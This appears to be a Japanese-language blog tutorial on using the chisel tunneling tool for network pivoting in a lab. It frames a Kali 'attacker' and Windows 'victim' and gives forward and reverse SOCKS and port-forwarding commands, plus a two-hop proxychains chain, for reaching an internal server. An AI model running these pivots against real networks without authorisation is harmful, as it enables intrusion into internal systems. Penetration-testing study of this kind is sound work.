banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

chisel代理工具

chisel は、HTTP ベースの高速な TCP/UDP トンネリングツールです。

プロジェクトのリンク:https://github.com/jpillora/chisel/releases

利点:SSH を使用して暗号化されており、セキュリティが良好です。切断待機と再接続メカニズムを備えており、安定性が高いです(ew と同様に長時間操作しないと切断されます)。Go 言語で書かれており、マルチプラットフォームをサポートしています。単一ファイルで依存関係がありません。

攻撃者(kali): 192.168.6.131
被害者(windows): 192.168.6.129

トポロジー:

攻撃者(192.168.6.131)<--> 被害者(192.168.6.129,10.1.1.1)< -- > 内部サーバー (10.1.1.2)

ターゲットアクセス: 10.1.1.2

一次プロキシ#

フォワード接続(socks)

ジャンプホスト(被害者)

./chisel server -p 12345

image

攻撃者

./chisel client 192.168.6.129:12345 socks

image

socks プロキシはポート 1080 にバインドされており、ローカルで socks5 プロキシを設定するだけでアクセスできます。

リバース接続

攻撃者(ハッカー)

./chisel server -p 12345 --reverse --socks5

ジャンプホスト(被害者)

chisel.exe client 192.168.6.128:12345 R:socks

image

攻撃者(ハッカー)は 10.1.1.2 にアクセスできます。

image

二次プロキシ#

image

特定のポートへのアクセス#

kali:

chisel  server -p 3333 --reverse

web01:

2 つのターミナルを開き、client と server の両方を実行する必要があります。

chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555

web02:

chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80

kali で 127.0.0.1:1111 にアクセスすると、192.168.59.129 の 80 ポートにアクセスできます。


socks プロキシ#

kali:

chisel server -p 3333 --reverse

web01:

2 つのターミナルを開き、client と server の両方を実行する必要があります。

chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks

web02:

chisel client 192.168.150.128:2222 R:5555:socks

proxychains.conf ファイルでプロキシチェーンを設定

socks5 127.0.0.1 1111
socks5 127.0.0.1 5555

参考:https://youtu.be/srUUUkcYEwg

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。